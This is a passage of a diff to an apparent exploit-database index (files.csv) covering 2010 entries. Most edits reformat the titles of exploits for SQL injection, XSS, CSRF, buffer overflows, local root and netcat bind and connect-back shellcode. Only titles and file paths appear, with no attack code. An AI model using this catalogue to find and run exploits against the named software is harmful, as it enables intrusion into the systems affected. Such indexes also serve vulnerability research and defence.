Uniyal",windows,dos,0 14291,platforms/php/webapps/14291.txt,"IXXO Cart for Joomla SQLi Vulnerability",2010-07-09,Sid3^effects,php,webapps,0 14293,platforms/php/webapps/14293.txt,"Minify4Joomla Upload and Persistent XSS Vulnerability",2010-07-09,Sid3^effects,php,webapps,0 -14294,platforms/php/webapps/14294.txt,"sphider v1.3.5 Remote File Inclusion Vulnerability",2010-07-09,Li0n-PaL,php,webapps,0 -14295,platforms/windows/dos/14295.html,"Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak [0-Day]",2010-07-09,"Ruben Santamarta",windows,dos,0 +14294,platforms/php/webapps/14294.txt,"sphider 1.3.5 - Remote File Inclusion Vulnerability",2010-07-09,Li0n-PaL,php,webapps,0 +14295,platforms/windows/dos/14295.html,"Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak (0day)",2010-07-09,"Ruben Santamarta",windows,dos,0 14296,platforms/php/webapps/14296.txt,"Joomla QuickFAQ Component (com_quickfaq) Blind SQL Injection Vulnerability",2010-07-09,RoAd_KiLlEr,php,webapps,0 14299,platforms/php/webapps/14299.txt,"CMS Contentia (news.php) SQL Injection Vulnerability",2010-07-09,GlaDiaT0R,php,webapps,0 14305,platforms/linux/shellcode/14305.c,"Linux/x86-64 - execve(""/sbin/iptables"", [""/sbin/iptables"", ""-F""], NULL) - 49 bytes",2010-07-09,10n1z3d,linux,shellcode,0 @@ -12543,14 +12543,14 @@ id,file,description,date,author,platform,type,port 14308,platforms/php/webapps/14308.txt,"Wordpress Firestats Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 ActiveX Buffer Overflow",2010-07-09,Blake,windows,remote,0 14310,platforms/php/webapps/14310.js,"DotDefender <= 3.8-5 No Authentication Remote Code Execution Through XSS",2010-07-09,rAWjAW,php,webapps,80 -14312,platforms/php/webapps/14312.txt,"Joomla redSHOP Component v1.0 (com_redshop pid) SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0 -14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) Blind SQL Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 +14312,platforms/php/webapps/14312.txt,"Joomla redSHOP Component 1.0 (com_redshop pid) - SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0 +14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) Blind SQL Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 14315,platforms/php/webapps/14315.txt,"Joomla MySMS Component (com_mysms) Upload Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 14316,platforms/php/webapps/14316.pl,"PHP-Nuke <= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit",2010-07-10,yawn,php,webapps,0 14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 -14321,platforms/windows/remote/14321.html,"Image22 ActiveX v1.1.1 Buffer Overflow Exploit",2010-07-10,Blake,windows,remote,0 +14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,Blake,windows,remote,0 14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0 14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0 @@ -12561,12 +12561,12 @@ id,file,description,date,author,platform,type,port 14330,platforms/php/webapps/14330.html,"TomatoCart 1.0.1 Multiple CSRF Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 14331,platforms/php/webapps/14331.html,"TomatoCMS 2.0.5 Multiple CSRF Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 14332,platforms/linux/shellcode/14332.c,"Linux x86 netcat bindshell port 8080 - 75 bytes",2010-07-11,Blake,linux,shellcode,0 -14333,platforms/php/webapps/14333.html,"Orbis CMS v1.0.2 Multiple CSRF Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 +14333,platforms/php/webapps/14333.html,"Orbis CMS 1.0.2 - Multiple CSRF Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 14334,platforms/lin_x86/shellcode/14334.c,"Linux x86 netcat connect back port 8080 - 76 bytes",2010-07-11,Blake,lin_x86,shellcode,0 14335,platforms/php/webapps/14335.txt,"Joomla Health & Fitness Stats Persistent XSS Vulnerability",2010-07-12,Sid3^effects,php,webapps,0 14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog Persistent XSS Vulnerability",2010-07-12,Sid3^effects,php,webapps,0 -14337,platforms/php/webapps/14337.html,"TheHostingTool v1.2.2 Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 -14338,platforms/php/webapps/14338.html,"GetSimple CMS v2.01 Multiple Vulnerabilities (XSS/CSRF)",2010-07-12,10n1z3d,php,webapps,0 +14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 +14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-12,10n1z3d,php,webapps,0 14339,platforms/linux/local/14339.sh,"Ubuntu PAM MOTD Local Root Exploit",2010-07-12,anonymous,linux,local,0 14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 @@ -12574,8 +12574,8 @@ id,file,description,date,author,platform,type,port 14346,platforms/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 (shw) Buffer Preoccupation PoC",2010-07-12,LiquidWorm,windows,dos,0 14349,platforms/windows/dos/14349.html,"Opera Denial of Service by Element",2010-07-12,"Pouya Daneshmand",windows,dos,0 14350,platforms/php/webapps/14350.txt,"Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability",2010-07-13,_mlk_,php,webapps,0 -14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script SQL Injection Vulnerability",2010-07-13,D4rk357,php,webapps,0 -14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter v3.1.2.1 SEH Exploit (Multiple OS, DEP and ASLR Bypass)",2010-07-13,Node,windows,local,0 +14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script SQL Injection Vulnerability",2010-07-13,D4rk357,php,webapps,0 +14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS, DEP and ASLR Bypass)",2010-07-13,Node,windows,local,0 14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 Multiple CSRF Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0 14354,platforms/php/webapps/14354.txt,"AJ Article Persistent XSS Vulnerability",2010-07-13,Sid3^effects,php,webapps,0 14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 Authentication Bypass Vulnerability",2010-07-13,"David K",windows,webapps,0 @@ -12584,21 +12584,21 @@ id,file,description,date,author,platform,type,port 14359,platforms/php/webapps/14359.html,"Zenphoto CMS 1.3 Multiple CSRF Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability",2010-07-14,"Meder Kydyraliev",multiple,remote,0 14361,platforms/windows/local/14361.py,"Microsoft Excel 0x5D record Stack Overflow Vulnerability",2010-07-14,webDEViL,windows,local,0 -14362,platforms/php/webapps/14362.txt,"SQL injection vulnerability in CMSQLite",2010-07-14,"High-Tech Bridge SA",php,webapps,0 +14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL injection vulnerability",2010-07-14,"High-Tech Bridge SA",php,webapps,0 14363,platforms/php/webapps/14363.txt,"Ad Network Script Persistent XSS Vulnerability",2010-07-14,Sid3^effects,php,webapps,0 14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 Multiple CSRF Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0 14365,platforms/php/webapps/14365.txt,"Campsite CMS remote Persistent XSS vulnerability",2010-07-15,D4rk357,php,webapps,0 -14366,platforms/php/webapps/14366.txt,"Whizzy CMS <= v10.01 Local File Inclusion Vulnerability",2010-07-15,"Anarchy Angel",php,webapps,0 +14366,platforms/php/webapps/14366.txt,"Whizzy CMS <= 10.01 - Local File Inclusion Vulnerability",2010-07-15,"Anarchy Angel",php,webapps,0 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 14368,platforms/php/webapps/14368.txt,"RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability",2010-07-15,"Salvatore Fresta",php,webapps,0 14369,platforms/jsp/webapps/14369.txt,"ORACLE BPM Process Administrator (XSS)",2010-07-15,Markot,jsp,webapps,0 14370,platforms/php/webapps/14370.txt,"BS Scripts Directory (info.php) SQL Injection Vulnerability",2010-07-15,D4rk357,php,webapps,0 14371,platforms/php/webapps/14371.txt,"BS Scripts Directory (articlesdetails.php) SQL Injection Vulnerability",2010-07-16,k4k4shi,php,webapps,0 -14372,platforms/windows/dos/14372.txt,"Haihaisoft PDF Reader OCX Control v1.1.2.0 Remote Buffer Overflow",2010-07-16,shinnai,windows,dos,0 -14373,platforms/win32/local/14373.pl,"Mini-Stream RM-MP3 Converter v3.1.2.1 (.pls) Stack Buffer Overflow universal",2010-07-16,MadjiX,win32,local,0 +14372,platforms/windows/dos/14372.txt,"Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow",2010-07-16,shinnai,windows,dos,0 +14373,platforms/win32/local/14373.pl,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.pls) Stack Buffer Overflow universal",2010-07-16,MadjiX,win32,local,0 14374,platforms/php/webapps/14374.txt,"Pre Web Host System Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 14375,platforms/php/webapps/14375.txt,"Pre Dynamic Institution Web Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 -14376,platforms/php/webapps/14376.txt,"Pre E-Smart Cart Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 +14376,platforms/php/webapps/14376.txt,"Pre E-Smart Cart Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 14377,platforms/php/webapps/14377.txt,"Pre SoftClones Marketing Management System Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 14378,platforms/php/webapps/14378.txt,"Pre Podcast Portal Authentication Bypass",2010-07-16,D4rk357,php,webapps,0 14379,platforms/multiple/dos/14379.txt,"Novell Groupwise Internet Agent Stack Overflow",2010-07-16,"Francis Provencher",multiple,dos,0 @@ -12606,38 +12606,38 @@ id,file,description,date,author,platform,type,port 14381,platforms/php/webapps/14381.txt,"Group Office Remote Command Execution Vulnerability",2010-07-16,"ADEO Security",php,webapps,0 14382,platforms/windows/webapps/14382.txt,"ActiTime 2.0-MA CSRF Vulnerability",2010-07-16,Markot,windows,webapps,0 14383,platforms/php/webapps/14383.txt,"Group Office (comment_id) SQL Injection Vulnerability",2010-07-16,"Canberk BOLAT",php,webapps,0 -14385,platforms/windows/remote/14385.html,"Avant Browser v11.7 build 45 Clickjacking Vulnerability",2010-07-17,"Pouya Daneshmand",windows,remote,0 -14386,platforms/multiple/remote/14386.html,"Opera Browser v10.60 Clickjacking Vulnerability",2010-07-17,"Pouya Daneshmand",multiple,remote,0 -14387,platforms/multiple/remote/14387.html,"Safari Browser v4.0.2 Clickjacking Vulnerability",2010-07-17,"Pouya Daneshmand",multiple,remote,0 -14388,platforms/multiple/remote/14388.html,"Netscape Browser v9.0.0.6 Clickjacking Vulnerability",2010-07-17,"Pouya Daneshmand",multiple,remote,0 +14385,platforms/windows/remote/14385.html,"Avant Browser 11.7 build 45 - Clickjacking Vulnerability",2010-07-17,"Pouya Daneshmand",windows,remote,0 +14386,platforms/multiple/remote/14386.html,"Opera Browser 10.60 - Clickjacking Vulnerability",2010-07-17,"Pouya Daneshmand",multiple,remote,0 +14387,platforms/multiple/remote/14387.html,"Safari Browser 4.0.2 - Clickjacking Vulnerability",2010-07-17,"Pouya Daneshmand",multiple,remote,0 +14388,platforms/multiple/remote/14388.html,"Netscape Browser 9.0.0.6 - Clickjacking Vulnerability",2010-07-17,"Pouya Daneshmand",multiple,remote,0 14389,platforms/php/webapps/14389.txt,"Freelancers Marketplace Script Persistent XSS Vulnerability",2010-07-17,Sid3^effects,php,webapps,0 14390,platforms/php/webapps/14390.txt,"Freelancer Marketplace Script Upload Vulnerability",2010-07-17,Sid3^effects,php,webapps,0 14391,platforms/php/webapps/14391.txt,"Subrion Auto Classifieds Persistent Xss Vulnerability",2010-07-17,Sid3^effects,php,webapps,0 -14392,platforms/php/webapps/14392.txt,"Kayako eSupport v3.70.02 SQL Injection Vulnerability",2010-07-17,Sid3^effects,php,webapps,0 +14392,platforms/php/webapps/14392.txt,"Kayako eSupport 3.70.02 - SQL Injection Vulnerability",2010-07-17,Sid3^effects,php,webapps,0 14393,platforms/php/webapps/14393.txt,"Calendarix (cal_cat.php) SQL Injection Vulnerability",2010-07-17,SixP4ck3r,php,webapps,0 14394,platforms/php/webapps/14394.txt,"Joomla Component (com_spa) SQL Injection Vulnerability",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14395,platforms/php/webapps/14395.txt,"Joomla Component (com_staticxt) SQL Injection Vulnerability",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14397,platforms/windows/local/14397.rb,"MoreAmp SEH Buffer Overflow (meta)",2010-07-17,MadjiX,windows,local,0 -14399,platforms/windows/remote/14399.py,"Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 -14400,platforms/windows/remote/14400.py,"Easy FTP Server v1.7.0.11 LIST Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 +14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - MKD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 +14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - LIST Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0 14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script Authentication Bypass",2010-07-18,walid,asp,webapps,0 -14402,platforms/windows/remote/14402.py,"Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-18,fdisk,windows,remote,0 +14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - CWD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-18,fdisk,windows,remote,0 14403,platforms/windows/local/14403.txt,"Microsoft Windows Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0 -14404,platforms/php/webapps/14404.txt,"Kayako eSupport (functions.php) v3.70.02 SQL Injection Vulnerability",2010-07-18,ScOrPiOn,php,webapps,0 +14404,platforms/php/webapps/14404.txt,"Kayako eSupport (functions.php) 3.70.02 - SQL Injection Vulnerability",2010-07-18,ScOrPiOn,php,webapps,0 14405,platforms/php/webapps/14405.txt,"PHP-Fusion Remote Command Execution Vulnerability",2010-07-18,"ViRuS Qalaa",php,webapps,0 14406,platforms/bsd/local/14406.pl,"GhostScript PostScript File Stack Overflow Exploit",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0 14407,platforms/aix/remote/14407.c,"rpc.pcnfsd Remote Format String Exploit",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta DoS Proof of Concept",2010-07-18,loneferret,windows,dos,0 14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server Remote Root Hash Disclosure Exploit",2010-07-18,Kingcope,aix,remote,0 -14410,platforms/php/webapps/14410.txt,"rapidCMS V2 Authentication Bypass",2010-07-18,Mahjong,php,webapps,0 +14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0 14412,platforms/windows/remote/14412.rb,"Hero DVD Buffer Overflow Exploit (meta)",2010-07-19,MadjiX,windows,remote,0 14413,platforms/windows/dos/14413.txt,"IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0 14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 'STEAMBLOB' Command Remote Denial of Service Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0 -14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 Remote File Upload",2010-07-20,indoushka,php,webapps,0 -14416,platforms/windows/remote/14416.html,"SapGUI BI v7100.1.400.8 Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0 +14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 Remote File Upload",2010-07-20,"indoushka salah el ddine",php,webapps,0 +14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0 14419,platforms/asp/webapps/14419.txt,"Caner Hikaye Script SQL Injection Vulnerability",2010-07-20,v0calist,asp,webapps,0 -14420,platforms/asp/webapps/14420.txt,"Mayasan Portal v2.0 (makaledetay.asp) SQL Injection Vulnerability",2010-07-20,v0calist,asp,webapps,0 -14421,platforms/asp/webapps/14421.txt,"Mayasan Portal v2.0 (haberdetay.asp) SQL Injection Vulnerability",2010-07-20,CoBRa_21,asp,webapps,0 +14420,platforms/asp/webapps/14420.txt,"Mayasan Portal 2.0 - (makaledetay.asp) SQL Injection Vulnerability",2010-07-20,v0calist,asp,webapps,0 +14421,platforms/asp/webapps/14421.txt,"Mayasan Portal 2.0 - (haberdetay.asp) SQL Injection Vulnerability",2010-07-20,CoBRa_21,asp,webapps,0 14422,platforms/multiple/dos/14422.c,"libpng <= 1.4.2 Denial of Service Vulnerability",2010-07-20,kripthor,multiple,dos,0 14423,platforms/php/webapps/14423.txt,"Joomla Component com_spa SQL Injection Vulnerability",2010-07-20,altbta,php,webapps,0 14424,platforms/windows/dos/14424.txt,"Lithtech Engine Memory Corruption Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0 @@ -12657,16 +12657,16 @@ id,file,description,date,author,platform,type,port 14439,platforms/php/webapps/14439.txt,"phpBazar admin Information Disclosure Vulnerability",2010-07-22,Net_Spy,php,webapps,0 14440,platforms/php/webapps/14440.txt,"PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability)",2010-07-22,Silic0n,php,webapps,0 14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker SQL Injection Vulnerability",2010-07-22,H-SK33PY,php,webapps,0 -14442,platforms/php/webapps/14442.txt,"ZeeAdbox v2x SQL Injection Vulnerability",2010-07-23,SONIC,php,webapps,0 +14442,platforms/php/webapps/14442.txt,"ZeeAdbox 2.x - SQL Injection Vulnerability",2010-07-23,SONIC,php,webapps,0 14443,platforms/php/webapps/14443.txt,"LILDBI Shell Upload Vulnerability",2010-07-23,EraGoN,php,webapps,0 -14444,platforms/php/webapps/14444.txt,"ZeeNetworking v1x- Arbitrary File Upload Vulnerability",2010-07-23,SONIC,php,webapps,0 -14445,platforms/php/webapps/14445.txt,"ZeeMatri v3x- Arbitrary File Upload Vulnerability",2010-07-23,SONIC,php,webapps,0 +14444,platforms/php/webapps/14444.txt,"ZeeNetworking 1x- Arbitrary File Upload Vulnerability",2010-07-23,SONIC,php,webapps,0 +14445,platforms/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload Vulnerability",2010-07-23,SONIC,php,webapps,0 14446,platforms/php/webapps/14446.txt,"PhotoPost PHP SQL Injection Vulnerability",2010-07-23,Cyber-sec,php,webapps,0 14447,platforms/windows/remote/14447.html,"Multiple Web Browser Clickjacking Vulnerability (FF3.6.7/SM 2.0.6)",2010-07-23,"Pouya Daneshmand",windows,remote,0 14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) SQL Injection Vulnerability",2010-07-23,Valentin,php,webapps,0 14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) SQL Injection Vulnerability",2010-07-23,Amine_92,php,webapps,0 -14451,platforms/windows/remote/14451.rb,"Easy FTP Server v1.7.0.11 LIST Command Remote BoF Exploit (Post Auth) - (meta)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 +14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - LIST Command Remote BoF Exploit (Post Auth) - (meta)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 14452,platforms/linux/dos/14452.txt,"Ubuntu 10.04 LTS - Lucid Lynx ftp Client v0.17-19build1 ACCT Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 (ecard.php) SQL Injection Vulnerability",2010-07-23,CoBRa_21,php,webapps,0 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script Remote Command Execution Vulnerability",2010-07-23,"HaCkEr arar",php,webapps,0 @@ -12679,7 +12679,7 @@ id,file,description,date,author,platform,type,port 14462,platforms/php/webapps/14462.txt,"Joomla Ozio Gallery Component (com_oziogallery) SQL Injection Vulnerability",2010-07-24,"ViRuS Qalaa",php,webapps,0 14463,platforms/php/webapps/14463.txt,"Joomla ITArmory Component (com_itarmory) SQL Injection Vulnerability",2010-07-24,Craw,php,webapps,0 14464,platforms/windows/local/14464.pl,"Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit",2010-07-24,"hadji samir",windows,local,0 -14465,platforms/php/webapps/14465.txt,"sNews v1.7 (index.php?category) SQL Injection Vulnerability",2010-07-24,CoBRa_21,php,webapps,0 +14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection Vulnerability",2010-07-24,CoBRa_21,php,webapps,0 14466,platforms/php/webapps/14466.txt,"Joomla Component (com_joomdle) SQL Injection Vulnerability",2010-07-24,kaMtiEz,php,webapps,0 14467,platforms/php/webapps/14467.txt,"Joomla Component (com_youtube) SQL Injection Vulnerability",2010-07-24,Forza-Dz,php,webapps,0 14469,platforms/php/webapps/14469.txt,"XAOS CMS SQL Injection Vulnerability",2010-07-25,H-SK33PY,php,webapps,0 @@ -12691,7 +12691,7 @@ id,file,description,date,author,platform,type,port 14477,platforms/windows/dos/14477.txt,"Media Player Classic Heap Overflow/DoS Vulnerability",2010-07-26,"Praveen Darshanam",windows,dos,0 14481,platforms/php/webapps/14481.txt,"Joomla Component TTVideo 1.0 SQL Injection Vulnerability",2010-07-27,"Salvatore Fresta",php,webapps,0 14482,platforms/windows/local/14482.py,"QQPlayer smi File Buffer Overflow Exploit",2010-07-27,"Lufeng Li",windows,local,0 -14483,platforms/php/webapps/14483.pl,"PunBB <= 1.3.4 and Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit",2010-07-27,Dante90,php,webapps,0 +14483,platforms/php/webapps/14483.pl,"PunBB <= 1.3.4 & Pun_PM <= 1.2.6 - Remote Blind SQL Injection Exploit",2010-07-27,Dante90,php,webapps,0 14484,platforms/windows/dos/14484.html,"IE6 / 7 Remote Dos vulnerability",2010-07-27,"Richard Leahy",windows,dos,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 Local File Inclusion Vulnerability",2010-07-27,"John Leitch",php,webapps,0 14488,platforms/php/webapps/14488.txt,"Joomla Component Appointinator 1.0.1 Multiple Remote Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 @@ -12699,9 +12699,9 @@ id,file,description,date,author,platform,type,port 14490,platforms/php/webapps/14490.txt,"nuBuilder Remote File inclusion Vulnerability",2010-07-28,Ahlspiess,php,webapps,0 14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability",2010-07-28,th_decoder,windows,local,0 14492,platforms/windows/remote/14492.c,"Symantec AMS Intel Alert Handler Service Design Flaw",2010-07-28,Spider,windows,remote,0 -14494,platforms/php/webapps/14494.txt,"AV Arcade v3 Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0 +14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0 14495,platforms/php/webapps/14495.txt,"Joomla Component PhotoMap Gallery 1.6.0 Multiple Blind SQL Injection",2010-07-28,"Salvatore Fresta",php,webapps,0 -14496,platforms/windows/remote/14496.py,"UPlusFTP Server v1.7.1.01 [ HTTP ] Remote Buffer Overflow [ Post Auth ]",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 +14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)",2010-07-28,fdisk,windows,local,0 14499,platforms/php/webapps/14499.txt,"Joomla Component PBBooking 1.0.4_3 Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0 14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0 @@ -12712,11 +12712,11 @@ id,file,description,date,author,platform,type,port 14505,platforms/windows/remote/14505.html,"BarCodeWiz Barcode ActiveX Control 3.29 BoF Exploit (SEH)",2010-07-30,loneferret,windows,remote,0 14511,platforms/windows/dos/14511.pl,"ChordPulse 1.4 Denial of Service Vulnerability",2010-07-30,MadjiX,windows,dos,0 14512,platforms/php/webapps/14512.txt,"Concept E-commerce SQL Injection Vulnerability",2010-07-31,Gendenk,php,webapps,0 -14514,platforms/windows/remote/14514.html,"SigPlus Pro v3.74 ActiveX LCDWriteString() Remote BoF JIT Spray - aslr/dep bypass",2010-07-31,mr_me,windows,remote,0 +14514,platforms/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote BoF JIT Spray - aslr/dep bypass",2010-07-31,mr_me,windows,remote,0 14515,platforms/windows/dos/14515.pl,"Xmyplay 3.5.1 Denial of Service Vulnerability",2010-07-31,"hadji samir",windows,dos,0 14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 Denial of Service Vulnerability",2010-07-31,"hadji samir",windows,dos,0 14518,platforms/php/webapps/14518.txt,"Joomla Component Spielothek 1.6.9 Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0 -14519,platforms/windows/remote/14519.html,"Barcodewiz v3.29 Barcode ActiveX Control Remote Heap Spray Exploit (IE6/IE7)",2010-07-31,Dr_IDE,windows,remote,0 +14519,platforms/windows/remote/14519.html,"Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit (IE6/IE7)",2010-07-31,Dr_IDE,windows,remote,0 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 Authentication Bypass Vulnerability",2010-08-01,Magnefikko,hardware,webapps,0 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 Source Disclosure and HTTP Authentication Bypass",2010-08-01,"Ben Schmidt",windows,remote,0 14523,platforms/php/webapps/14523.txt,"SnoGrafx (cat.php?cat) SQL Injection Vulnerability",2010-08-02,CoBRa_21,php,webapps,0 @@ -12727,25 +12727,25 @@ id,file,description,date,author,platform,type,port 14531,platforms/php/webapps/14531.pdf,"Cybsec Advisory Multiple Cross-Site Scripting (XSS) in MyIT CRM",2010-08-02,"Juan Manuel Garcia",php,webapps,0 14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0 14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 aswFW.sys kernel driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0 -14534,platforms/php/webapps/14534.txt,"68KB v1.0.0rc4 Remote File Include Vulnerability",2010-08-03,eidelweiss,php,webapps,0 +14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Include Vulnerability",2010-08-03,eidelweiss,php,webapps,0 14536,platforms/hardware/remote/14536.txt,"Unauthorized Access to Root NFS Export on EMC Celerra NAS Appliance",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0 14537,platforms/multiple/dos/14537.txt,"Oracle MySQL 'ALTER DATABASE' Remote Denial Of Service Vulnerability",2010-08-03,"Shane Bester",multiple,dos,0 14538,platforms/hardware/local/14538.txt,"Apple iOS pdf Jailbreak 